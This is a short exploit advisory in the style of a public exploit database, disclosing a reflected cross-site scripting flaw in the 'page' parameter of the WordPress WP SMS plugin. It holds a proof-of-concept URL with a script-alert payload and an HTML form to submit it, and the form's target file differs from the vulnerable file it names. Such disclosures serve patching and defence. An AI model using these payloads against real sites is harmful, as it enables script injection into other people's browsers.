############################################
#Exploit Title : Wp sms "page" parameter XSS
#Vendor Homepage : http://wordpress.org/plugins/wp-sms/
#Category : Webapps
#date : 20.9.2017
#Tested On : WiN , KaLi_LiNuX
#Author : Ali Alizadeh asl
#Dork: N/A
#Telegram: @OverFear
############################################
Description:
XSS allows an Attacker to run java script codes.
==================
Vulnerable webpage :
http://localhost/wordpress/wp-content/plugins/wp-sms/includes/templates/subscribe/groups.php
==================
Vulnerable Source :
line10: echo $_REQUEST['page']
==================
PoC:
http://localhost/wordpress/wp-content/plugins/wp-sms-master/includes/templates/subscribe/groups.php?page=<script>alert('XSS!')</script>
==================
Exploit :
<html>
<form action="http://localhost:8080/wordpress/wp-content/plugins/wp-sms-master/includes/templates/subscribe/subscribes.php" method="get">
<input type="text" name="page">
<input type="submit" value="XSS">
</form>
</html>